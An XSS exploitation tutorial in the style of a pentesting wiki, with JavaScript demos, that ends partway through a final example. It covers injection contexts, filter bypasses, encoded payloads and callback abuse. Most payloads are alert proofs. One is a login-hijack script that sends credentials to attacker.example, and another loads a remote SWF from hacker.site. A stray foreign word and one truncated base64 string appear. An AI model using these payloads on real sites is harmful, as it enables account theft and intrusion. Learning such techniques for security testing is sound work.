XSS (Cross Site Scripting)
Methodology
- Check whether any value you control (parameters, path, headers?, cookies?) is reflected in the HTML or used by JS code.
- Find the context where it is reflected/used.
- If it is reflected:
  - Check which characters you can use and, depending on that, prepare the payload:
    - In raw HTML:
      - Can you create new HTML tags?
      - Can you use events or attributes that support the `javascript:` protocol?
      - Can you bypass protections?
      - Is the HTML content interpreted by a client-side JS template engine (AngularJS, VueJS, Mavo...)? Then you may be able to abuse a Client Side Template Injection.
      - If you cannot create HTML tags that execute JS code, can you abuse Dangling Markup - HTML scriptless injection?
    - Inside an HTML tag:
      - Can you break out of the attribute and out of the tag (then you are in raw HTML) and create a new HTML tag to abuse?
      - Can you create new events/attributes that execute JS code?
      - Does the attribute you are stuck in support JS execution?
      - Can you bypass protections?
    - Inside JavaScript code:
      - Can you escape the `<script>` tag?
      - Can you escape the string and execute different JS code?
      - Is your input inside template literals ``?
      - Can you bypass protections?
  - The input names a JavaScript function that gets executed:
    - You can indicate the name of the function to execute, e.g. `?callback=alert(1)`
- If it is used by JS code:
  - You could exploit a DOM XSS: pay attention to how your input is handled and whether the value you control reaches any sink.
When working on a complex XSS you might find it interesting to know about debugging client-side JS (see the corresponding page).
Reflected values
To exploit an XSS successfully, the first thing you need to find is a value you control that is reflected in the web page.
- Intermediately reflected: if you find that the value of a parameter, or even the path, is reflected in the web page you can exploit a Reflected XSS.
- Stored and reflected: if you find that a value you control is saved on the server and reflected every time you access a page you can exploit a Stored XSS.
- Accessed via JS: if you find that a value you control is read by JS code you can exploit a DOM XSS.
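As an added example (not code from the original page), the probe below automates the first two steps of the methodology: it finds where a canary value lands (raw HTML, inside a tag, inside an attribute, inside JS code or a JS string) and which breakout characters come back unchanged. The four "applications" at the bottom are constructed reflection behaviours that stand in for real responses.

```javascript
// Added example, not code from the original page: a small probe that tells you where
// a reflected canary lands (raw HTML, tag, attribute, JS code, JS string) and which
// breakout characters survive. The "applications" at the bottom are constructed
// sample reflection behaviours, not real targets.

const CANARY = "zx9q";
const PROBE_CHARS = ["<", ">", '"', "'", "`", "/", "\\"];

// Scan JS text and report which quote (if any) is still open at the end.
function openQuote(js) {
  let quote = null;
  for (let i = 0; i < js.length; i++) {
    const c = js[i];
    if (quote) {
      if (c === "\\") i++;            // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'" || c === "`") {
      quote = c;
    }
  }
  return quote;
}

// Decide the syntactic context surrounding the first occurrence of the canary.
function classifyReflection(html, canary = CANARY) {
  const idx = html.indexOf(canary);
  if (idx === -1) return { context: "not-reflected" };
  const before = html.slice(0, idx);

  // Unbalanced <script> openings before the canary mean we are inside script code.
  const opens = (before.match(/<script\b[^>]*>/gi) || []).length;
  const closes = (before.match(/<\/script\s*>/gi) || []).length;
  if (opens > closes) {
    const start = before.lastIndexOf("<script");
    const js = before.slice(before.indexOf(">", start) + 1);
    const q = openQuote(js);
    return { context: q ? `js-string:${q}` : "js-code" };
  }

  // A "<" after the last ">" means the canary sits inside a tag.
  if (before.lastIndexOf("<") > before.lastIndexOf(">")) {
    const tagText = before.slice(before.lastIndexOf("<"));
    const m = tagText.match(/([a-zA-Z:-]+)\s*=\s*(["']?)[^"']*$/);
    if (m) return { context: "attribute", attr: m[1].toLowerCase(), quote: m[2] };
    return { context: "tag" };
  }
  return { context: "html" };
}

// Send canary+char and keep the chars that come back unchanged right after the canary.
function survivingChars(reflect, chars = PROBE_CHARS) {
  return chars.filter((ch) => reflect(CANARY + ch).includes(CANARY + ch));
}

function analyse(reflect) {
  return { ...classifyReflection(reflect(CANARY)), survives: survivingChars(reflect) };
}

// Constructed sample behaviours: each takes the user value and returns the page body.
const htmlEscape = (s) => s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;");
const samples = {
  rawHtml:    (q) => `<html><body><p>Results for ${q}</p></body></html>`,
  escaped:    (q) => `<html><body><p>Results for ${htmlEscape(q)}</p></body></html>`,
  attrQuoted: (q) => `<a href="/search?q=${q.replace(/</g, "&lt;").replace(/>/g, "&gt;")}">again</a>`,
  jsString:   (q) => `<script>var term = '${q.replace(/</g, "\\x3c")}';</script>`,
};

for (const [name, reflect] of Object.entries(samples)) {
  console.log(name, analyse(reflect));
}
```

Against a real target, replace the `reflect` functions with a request that sends the canary and returns the response body; the `attrQuoted` and `jsString` results show the useful outcome of the probe, which is that `<` is dead but `"` or `'` still survives, so the attack moves to the attribute or JS-string techniques described below.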
Contexts
When trying to exploit an XSS, the first thing you need to know is where your input is reflected. Depending on the context you will be able to execute JS code in different ways.
Raw HTML
If your input is reflected in the raw HTML of the page you will need to abuse some HTML tag in order to execute JS code: `<img`, `<iframe`, `<svg`, `<script`... these are just some of the many HTML tags you could use.
Also, keep in mind Client Side Template Injection.
Inside HTML tag attributes
If your input is reflected inside the value of an attribute of a tag you could try:
- To escape from the attribute and from the tag (then you will be in the raw HTML) and create a new HTML tag to abuse: `"><img [...]`
- If you can escape from the attribute but not from the tag (`>` is encoded or deleted), depending on the tag you could create an event that executes JS code: `" autofocus onfocus=alert(1) x="`
- If you cannot escape from the attribute (`"` is encoded or deleted), then depending on which attribute your value is reflected in, and whether you control all of the value or only a part of it, you will still be able to abuse it. For example, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it is clicked. Another interesting example is the `href` attribute, where you can use the `javascript:` protocol to execute arbitrary code: `href="javascript:alert(1)"`
- If your input is reflected inside "unexploitable tags" you could try the `accesskey` trick to abuse the vulnerability (you will need some kind of social engineering to exploit it): `" accesskey="x" onclick="alert(1)" x="`
Weird example of Angular executing XSS if you control the class name:
<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>
Inside JavaScript code
In this case your input is reflected between `<script> [...] </script>` tags of an HTML page, inside a `.js` file or inside an attribute using the `javascript:` protocol:
- If reflected between `<script> [...] </script>` tags, even if your input is inside any kind of quotes, you can try to inject `</script>` and escape from this context. This works because the browser first parses the HTML tags and only then the content, so it will not notice that your injected `</script>` tag sits inside JS code.
- If reflected inside a JS string and the previous trick does not work, you will need to exit the string, execute your code and reconstruct the JS code (if there is any syntax error, nothing will be executed):
'-alert(1)-'
';-alert(1)//
\';alert(1)//
- If reflected inside template literals you can embed JS expressions using the `${ ... }` syntax:
var greetings = `Hello, ${alert(1)}`
- Unicode escapes are valid JavaScript; the following all evaluate to `alert(1)`:
\u0061lert(1)
\u{61}lert(1)
\u0061\u006C\u0065\u0072\u0074(1)
JavaScript Hoisting
JavaScript hoisting refers to the ability to declare functions, variables or classes after they are used, so you can abuse scenarios where an XSS payload lands after code that uses undeclared variables or functions.
See the JavaScript Hoisting page for more info.
JavaScript Function
Several web pages have endpoints that accept as parameter the name of the function to execute. A common example to see in the wild is something like `?callback=callbackFunc`.
A good way to find out whether something given directly by the user is being executed is to modify the param value (for example to 'Vulnerable') and look at the browser console for an error such as `Uncaught ReferenceError: Vulnerable is not defined`.
If it is vulnerable, you could trigger an alert just by sending the value `?callback=alert(1)`. However, it is very common that these endpoints validate the content to only allow letters, numbers, dots and underscores (`[\w\._]`).
Even with that limitation it is still possible to perform some actions, because those allowed characters are enough to reach any element in the DOM through a property access chain. Some useful properties for this:
firstElementChild
lastElementChild
nextElementSibling
previousElementSibling
parentElement
You can also try to trigger JavaScript functions directly: `obj.sales.delOrders`.
However, the endpoints that execute the indicated function are usually endpoints without much interesting DOM; other pages in the same origin will have a more interesting DOM to perform more actions.
Therefore, to abuse this vulnerability in a different DOM, the Same Origin Method Execution (SOME) technique was developed:
SOME - Same Origin Method Execution
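The following is an added example (not code from the original page) that simulates the callback endpoint described above: the name filter only allows `[\w.]`, yet a dotted chain such as `obj.sales.delOrders` or `document.body.firstElementChild.click` still resolves to, and invokes, a function. `makeAppState` is a constructed stand-in for the page's window/DOM object graph; the hardened variant at the end uses an exact allowlist instead of property traversal.

```javascript
// Added example, not code from the original page: simulates a "?callback=<name>"
// endpoint whose name filter allows only [\w.] characters, and shows why that still
// lets an attacker reach any function through a dotted property chain. `makeAppState`
// builds a constructed stand-in for the page's window/DOM object graph.

const CALLBACK_RE = /^[\w.]+$/;   // letters, digits, underscore and dots only

// Look the name up as a property chain on the root object, the way the browser
// resolves `obj.sales.delOrders(data)` once the JSONP response is executed.
function resolveCallback(root, name) {
  if (!CALLBACK_RE.test(name)) throw new Error("invalid callback name");
  return name.split(".").reduce((o, key) => (o == null ? undefined : o[key]), root);
}

// Constructed object graph with a legitimate callback, a privileged function and
// a DOM-like chain reachable through the allowed characters.
function makeAppState() {
  const log = [];
  return {
    log,
    jsonpCallback: (data) => log.push(`render:${data}`),
    obj: { sales: { delOrders: (data) => log.push(`deleted:${data}`) } },
    document: { body: { firstElementChild: { click: () => log.push("clicked") } } },
  };
}

// Vulnerable pattern: whatever the chain resolves to gets invoked.
function serveJsonpVulnerable(state, callbackName, data) {
  const fn = resolveCallback(state, callbackName);
  if (typeof fn !== "function") throw new Error("callback is not a function");
  fn(data);
  return state.log;
}

// Hardened pattern: exact allowlist, no property traversal at all.
const ALLOWED_CALLBACKS = new Set(["jsonpCallback"]);
function serveJsonpSafe(state, callbackName, data) {
  if (!ALLOWED_CALLBACKS.has(callbackName)) throw new Error("callback not allowed");
  state[callbackName](data);
  return state.log;
}

console.log(serveJsonpVulnerable(makeAppState(), "obj.sales.delOrders", "42"));           // [ 'deleted:42' ]
console.log(serveJsonpVulnerable(makeAppState(), "document.body.firstElementChild.click")); // [ 'clicked' ]
```

The regex check is not the problem by itself; the problem is that the name is resolved dynamically. In a real page the same thing happens when the JSONP response text `obj.sales.delOrders({...})` is executed by the browser, which is why only an exact allowlist of callback names is safe.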
DOM
There is JS code that uses in an unsafe way some data controlled by an attacker, like `location.href`. An attacker could abuse this to execute arbitrary JS code.
Universal XSS
These kinds of XSS can be found anywhere. They do not depend only on the client-side exploitation of a web application but on any context. These kinds of arbitrary JavaScript execution can even be abused to obtain RCE, read arbitrary files on clients and servers, and more.
Some examples (see the linked pages):
Injecting inside raw HTML
When your input is reflected inside the HTML page, or you can escape and inject HTML code in this context, the first thing you need to do is check whether you can abuse `<` to create new tags: just try to reflect that char and check whether it is being HTML encoded, deleted, or reflected without changes. Only in the last case will you be able to exploit this.
For these cases also keep in mind Client Side Template Injection.
Note: an HTML comment can be closed using `-->` or `--!>`
In this case, and if no black/whitelisting is used, you could use payloads like:
<script>
alert(1)
</script>
<img src="x" onerror="alert(1)" />
<svg onload=alert('XSS')>
But, if tags/attributes black/whitelisting is being used, you will need to brute-force which tags you can create.
Once you have located which tags are allowed, you will need to brute-force attributes/events inside the valid tags you found to see how you can attack the context.
Tags/Events brute-force
Go to https://portswigger.net/web-security/cross-site-scripting/cheat-sheet and click Copy tags to clipboard. Then, send all of them using Burp Intruder and check whether any tag was not flagged as malicious by the WAF. Once you have discovered which tags you can use, you can brute force all the events using the valid tags (on the same web page click Copy events to clipboard and follow the same procedure as before).
Custom tags
If you did not find any valid HTML tag, you could try to create a custom tag and execute JS code with the `onfocus` attribute. In the XSS request you need to end the URL with `#` to make the page focus on that object and execute the code:
/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x
Blacklist Bypasses
If some kind of blacklist is being used you could try to bypass it with some silly tricks:
//Random capitalization
<script> --> <ScrIpT>
<img --> <ImG
//Double tag, in case just the first match is removed
<script><script>
<scr<script>ipt>
<SCRscriptIPT>alert(1)</SCRscriptIPT>
//You can substitute the space that separates attributes with:
/
/*%00/
/%00*/
%2F
%0D
%0C
%0A
%09
//Unexpected parent tags
<svg><x><script>alert('1')</x>
//Unexpected weird attributes
<script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>
//Not closing tag, ending with " <" or " //"
<iframe SRC="javascript:alert('XSS');" <
<iframe SRC="javascript:alert('XSS');" //
//Extra open
<<script>alert("XSS");//<</script>
//Just weird and unexpected, use your imagination
<</script/script><script>
<input type=image src onerror="prompt(1)">
//Using `` instead of parenthesis
onerror=alert`1`
//Use more than one
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
Length bypass (small XSSs)
Note: the smallest XSS payloads for different environments can be found here and here.
<!-- Taken from the blog of Jorge Lajara -->
<svg/onload=alert``> <script src=//aa.es> <script src=//℡㏛.pw>
The last one is using 2 unicode characters which expands to 5: telsr
More of these characters can be found here.
To check in which characters are decomposed check here.
Click XSS - Clickjacking
If in order to exploit the vulnerability you need the user to click a link or a form with pre-filled data, you could try to abuse Clickjacking (if the page is vulnerable).
Impossible - Dangling Markup
If you think that it is impossible to create an HTML tag with an attribute to execute JS code, you should check Dangling Markup, because you could exploit the vulnerability without executing JS code.
Injecting inside HTML tag
Inside the tag/escaping from attribute value
If you are inside an HTML tag, the first thing you could try is to escape from the tag and use some of the techniques mentioned in the previous section to execute JS code.
If you cannot escape from the tag, you could create new attributes inside the tag to try to execute JS code, for example using a payload like the following (note that in this example double quotes are used to escape from the attribute; you will not need them if your input is reflected directly inside the tag):
" autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x
Style events
<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>
#Payload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
#moving your mouse anywhere over the page (0-click-ish):
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
Inside the attribute
Even if you cannot escape from the attribute (`"` is being encoded or deleted), depending on which attribute your value is reflected in, and whether you control all of the value or only a part of it, you will be able to abuse it. For example, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it is clicked.
Another interesting example is the `href` attribute, where you can use the `javascript:` protocol to execute arbitrary code: `href="javascript:alert(1)"`
Bypass inside event using HTML encoding/URL encode
HTML-encoded characters inside the value of HTML tag attributes are decoded at runtime, before the event handler's JS is parsed. Therefore something like the following is valid (the payload is the entity-encoded part):
<a id="author" href="http://none" onclick="var tracker='http://foo?&apos;-alert(1)-&apos;';">Go Back </a>
Note that any kind of HTML encoding is valid:
//HTML entities
&apos;-alert(1)-&apos;
//HTML hex without zeros
&#x27;-alert(1)-&#x27;
//HTML hex with zeros
&#x00027;-alert(1)-&#x00027;
//HTML dec without zeros
&#39;-alert(1)-&#39;
//HTML dec with zeros
&#00039;-alert(1)-&#00039;
<a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>
<a href="&#106;avascript:alert(2)">a</a>
<a href="jav&#x61;script:alert(3)">a</a>
Note that URL encoding will also work:
<a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>
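Added example (not code from the original page) of why the entity forms listed above get past a filter that inspects the attribute value before the browser decodes it: `decodeAttribute` reproduces the decoding of named, decimal and hex entities (leading zeros included), a naive quote filter is run before and after decoding, and the resulting `onclick` handler is executed with a stub `alert` to confirm the injected call fires. The payload strings are constructed for the demo.

```javascript
// Added example, not code from the original page: why a filter that runs before
// attribute decoding misses entity-encoded payloads. decodeAttribute() mimics the
// browser's decoding of the entity forms listed above; the payloads are constructed.

const NAMED_ENTITIES = { apos: "'", quot: '"', amp: "&", lt: "<", gt: ">" };

// Decode &name; , &#NNN; and &#xHHH; (leading zeros allowed) the way an HTML
// attribute value is decoded before the event handler is handed to the JS parser.
function decodeAttribute(value) {
  return value.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (whole, body) => {
    if (body[0] === "#") {
      const hex = body[1].toLowerCase() === "x";
      return String.fromCodePoint(parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10));
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named === undefined ? whole : named;   // unknown names are left untouched
  });
}

// Naive filter: rejects raw quotes in the *encoded* value (what a WAF often sees).
function naiveFilterAllows(value) {
  return !/['"]/.test(value);
}

// Correct order: decode the way the browser will, then decide.
function decodedFilterAllows(value) {
  return naiveFilterAllows(decodeAttribute(value));
}

// Build the handler `onclick="var tracker='http://foo?<value>';"` the way the page
// above does and run it with a stub alert, reporting whether the injected call fired.
function handlerFires(encodedValue) {
  let fired = false;
  const handler = `var tracker='http://foo?${decodeAttribute(encodedValue)}';`;
  new Function("alert", handler)(() => { fired = true; });
  return fired;
}

const PAYLOADS = [
  "&apos;-alert(1)-&apos;",          // named entity
  "&#x27;-alert(1)-&#x27;",          // hex
  "&#x00027;-alert(1)-&#x00027;",    // hex with leading zeros
  "&#39;-alert(1)-&#39;",            // decimal
  "&#00039;-alert(1)-&#00039;",      // decimal with leading zeros
];

for (const p of PAYLOADS) {
  console.log(p, "->", decodeAttribute(p), "naive allows:", naiveFilterAllows(p), "fires:", handlerFires(p));
}
```

Every payload decodes to `'-alert(1)-'`, so the handler becomes `var tracker='http://foo?'-alert(1)-'';`, which is syntactically valid and calls `alert` while evaluating the subtraction. The naive filter lets all five through; the same filter applied after decoding rejects all of them, which is the order a real defence has to use.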
Bypass inside event using Unicode encode
//Unicode escapes are valid inside identifiers such as "alert", but not in punctuation such as "(1)"
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
Special protocols within the attribute
There you can use the `javascript:` or `data:` protocols in some places to execute arbitrary JS code. Some will require user interaction and some will not.
javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript&colon;alert(1)
javascript&#x003A;alert(1)
javascript&#58;alert(1)
&#14;javascript:alert(1)
java        //Note the new line
script:alert(1)
data:text/html,<script>alert(1)</script>
DaTa:text/html,<script>alert(1)</script>
data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
data:text/html;charset=UTF-8,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
 A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
Places where you can inject these protocols
In general the `javascript:` protocol can be used in any tag that accepts the `href` attribute and in most of the tags that accept the `src` attribute (but not `<img>`).
<a href="javascript:alert(1)">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<form action="javascript:alert(1)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>
<object data="data:text/html,<script>alert(5)</script>">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src=" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
<iframe src="data:text/html,<script>alert(5)</script>"></iframe>
//Special cases
<object data="//hacker.site/xss.swf"> //https://github.com/evilcos/xss.swf
<embed code="//hacker.site/xss.swf" allowscriptaccess=always> //https://github.com/evilcos/xss.swf
<iframe srcdoc="<svg onload=alert(4);>">
Other obfuscation tricks
In this case the HTML encoding and the Unicode encoding tricks from the previous section are also valid, since you are inside an attribute.
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
Moreover, there is another nice trick for these cases: even if your input inside `javascript:...` is being URL encoded, it will be URL decoded before it is executed. So, if you need to escape from the string using a single quote and you see that it is being URL encoded, remember that it does not matter, it will be interpreted as a single quote during execution.
&apos;-alert(1)-&apos;
%27-alert(1)-%27
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
Note that if you try to use both URL encoding and HTML encoding, in any order, to encode the whole payload it will not work, but you can mix them inside the payload.
Using Hex and Octal encoding with javascript:
You can use Hex and Octal encoding inside the `src` attribute of an `iframe` (at least) to declare HTML tags to execute JS:
//Encoded: <svg onload=alert(1)>
// This WORKS
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />
//Encoded: alert(1)
// This doesn't work
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />
Reverse tab nabbing
<a target="_blank" rel="opener"
If you can inject any URL into an arbitrary `<a href=` tag that contains the attributes `target="_blank"` and `rel="opener"`, check the Reverse Tab Nabbing page to exploit this behaviour.
on Event Handlers Bypass
First of all check the cheat sheet (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) for useful "on" event handlers.
If there is some blacklist preventing you from creating these event handlers you can try the following bypasses:
<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>
//chars allowed between the onevent and the "="
IExplorer: %09 %0B %0C %020 %3B
Chrome: %09 %20 %28 %2C %3B
Safari: %2C %3B
Firefox: %09 %20 %28 %2C %3B
Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B
XSS in "Unexploitable tags" (hidden input, link, canonical, meta)
As described here, it is now possible to abuse hidden inputs with:
<button popovertarget="x">Click me</button>
<input type="hidden" value="y" popover id="x" onbeforetoggle="alert(1)" />
And in meta tags:
<!-- Injection inside meta attribute-->
<meta name="apple-mobile-web-app-title" content=""Twitter popover id="newsletter" onbeforetoggle="alert(2)" />
<!-- Existing target-->
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>
From here: you can execute an XSS payload inside a hidden attribute, provided you can persuade the victim into pressing the key combination. On Firefox Windows/Linux the key combination is ALT+SHIFT+X and on OS X it is CTRL+ALT+X. You can specify a different key combination using a different key in the access key attribute. Here is the vector:
<input type="hidden" accesskey="X" onclick="alert(1)">
The XSS payload will be something like this: `" accesskey="x" onclick="alert(1)" x="`
Blacklist Bypasses
Several tricks using different encodings were already exposed inside this section. Go back to learn where you can use:
- HTML encoding (HTML tags)
- Unicode encoding (can be valid JS code): `\u0061lert(1)`
- URL encoding
- Hex and Octal encoding
- data encoding
Bypasses for HTML tags and attributes
Read the Blacklist Bypasses of the previous section.
Bypasses for JavaScript code
Read the JavaScript bypass blacklist of the following section.
CSS-Gadgets
If you found an XSS in a very small part of the web that requires some kind of interaction (maybe a small link in the footer with an onmouseover element), you can try to modify the space that element occupies to maximise the probability of the link being triggered.
For example, you could add some styling to the element like: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
But, if the WAF is filtering the style attribute, you can use CSS Styling Gadgets, so if you find, for example
.test {display:block; color: blue; width: 100%}
and
#someid {top: 0; font-family: Tahoma;}
you can modify the link into the form
<a href="" id=someid class=test onclick=alert() a="">
This trick was taken from https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703
Injecting inside JavaScript code
In these cases your input is going to be reflected inside the JS code of a `.js` file, between `<script>...</script>` tags, inside HTML events that can execute JS code, or inside attributes that accept the `javascript:` protocol.
Escaping <script> tag
If your code is inserted within `<script> [...] var input = 'reflected data' [...] </script>` you could easily escape by closing the `<script>` tag:
</script><img src=1 onerror=alert(document.domain)>
Note that in this example we have not even closed the single quote. This is because HTML parsing is performed first by the browser, which involves identifying page elements, including blocks of script. The parsing of JavaScript to understand and execute the embedded scripts is only carried out afterwards.
Inside JS code
If `<>` are being sanitised you can still escape the string where your input is located and execute arbitrary JS. It is important to fix the JS syntax, because if there are any errors the JS code will not be executed:
'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//
JS-in-JS string break → inject → repair pattern
When user input lands inside a quoted JavaScript string (for example, a server-side echo into an inline script), you can terminate the string, inject code, and repair the syntax so that parsing remains valid. Generic skeleton:
"            // end original string
;            // safely terminate the statement
<INJECTION>  // attacker-controlled JS
; a = "      // repair and resume expected string/statement
Example URL shape when the vulnerable parameter is reflected inside a JS string:
?param=test";<INJECTION>;a="
This executes attacker JS without needing to touch the HTML context (pure JS-in-JS). Combine with the blacklist bypasses below when filters block keywords.
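Added example (not code from the original page): a constructed inline-script template with the raw echo, the break/inject/repair payload from the skeleton above run against it, and the hardened encoder that a fix would use. `track` and `pwned` are stub functions standing in for the page's own code and the attacker's injection.

```javascript
// Added example, not code from the original page: a constructed inline-script
// template with the raw echo, the break/inject/repair payload against it, and the
// hardened encoder. `track` and `pwned` are stubs standing in for the page's own
// function and for the attacker's code.

// Vulnerable: the parameter is echoed straight into a JS string literal.
function renderVulnerable(param) {
  return `<script>var search = "${param}"; track(search);</script>`;
}

// Hardened: JSON-encode the value (quotes, backslashes, newlines) and escape "<"
// so a "</script>" inside the value cannot end the script block early.
function jsStringLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}
function renderHardened(param) {
  return `<script>var search = ${jsStringLiteral(param)}; track(search);</script>`;
}

// Pull the script body out of the page and run it with instrumented stubs.
function runInlineScript(page) {
  const body = page.match(/<script>([\s\S]*?)<\/script>/)[1];
  const state = { tracked: null, injected: false };
  new Function("track", "pwned", body)(
    (s) => { state.tracked = s; },
    () => { state.injected = true; }
  );
  return state;
}

// break the string -> inject -> repair the syntax (the `?param=test";<INJECTION>;a="` shape)
const PAYLOAD = 'test";pwned();a="';

console.log(runInlineScript(renderVulnerable(PAYLOAD)));  // { tracked: 'test', injected: true }
console.log(runInlineScript(renderHardened(PAYLOAD)));    // { tracked: 'test";pwned();a="', injected: false }
```

With the raw echo the generated script is `var search = "test";pwned();a=""; track(search);`, which parses cleanly and runs the injected call before the page's own code. With the JSON-encoded literal the same input is just data, and the `\u003c` substitution also neutralises the `</script>` escape described in the previous section.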
Template literals ``
In order to construct strings apart from single and double quotes, JS also accepts backticks ``. This is known as template literals as they allow embedded JS expressions using the `${ ... }` syntax.
Therefore, if you find that your input is being reflected inside a JS string that is using backticks, you can abuse the `${ ... }` syntax to execute arbitrary JS code:
This can be abused using:
;`${alert(1)}``${`${`${`${alert(1)}`}`}`}`
// This is valid JS code, because each time the function returns itself it's recalled with ``
function loop() {
return loop
}
loop``
Encoded code execution
<script>\u0061lert(1)</script>
<svg><script>alert&#40;'1'&#41;
<svg><script>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</script></svg> <!-- The svg tags are necessary
<iframe srcdoc="&lt;SCRIPT&gt;alert(1)&lt;/iframe&gt;">
Deliverable payloads with eval(atob()) and scope nuances
To keep URLs short and evade simple keyword filters, you can base64-encode your real logic and evaluate it with `eval(atob('...'))`. If a naive keyword filter blocks identifiers like `alert`, `eval` or `atob`, use Unicode-escaped identifiers, which compile to the same thing in the browser but evade filters matching the literal character sequence:
\u0061\u006C\u0065\u0072\u0074(1) // alert(1)
\u0065\u0076\u0061\u006C(\u0061\u0074\u006F\u0062('BASE64')) // eval(atob('...'))
Important scope difference: `const`/`let` declared inside `eval()` are block-scoped and do NOT create global variables; they will not be reachable from subsequent scripts. Use a dynamically injected `<script>` element to define global, non-reassignable hooks where needed (for example, to hijack a form handler):
var s = document.createElement('script');
s.textContent = "const DoLogin = () => {const pwd = Trim(FormInput.InputPassword.value); const user = Trim(FormInput.InputUtente.value); fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd));}";
document.head.appendChild(s);
Marejeleo: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval
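The scope difference described above, as an added example that is not part of the original page: a constructed base64 stage is decoded and run through an indirect eval (global scope), and the code then checks which of the four "hook" definitions a later script could actually see. The hook names are invented for the demo; `Buffer` is used for the base64 round trip when `atob` is not available.

```javascript
// Added example, not code from the original page: what a base64 stage run through
// eval(atob(...)) leaves behind for later scripts. Indirect eval runs in the global
// scope; `const`/`let` still stay inside the eval. The hook names are invented.

const toB64 = (s) => Buffer.from(s, "utf8").toString("base64");
const fromB64 = (s) => (typeof atob === "function" ? atob(s) : Buffer.from(s, "base64").toString("latin1"));

// Constructed stage: four ways of defining a "hook", one per declaration kind.
const STAGE = [
  "const constHook = () => 'const';",             // lexical: scoped to the eval code only
  "var varHook = () => 'var';",                   // var in global (indirect) eval: becomes global
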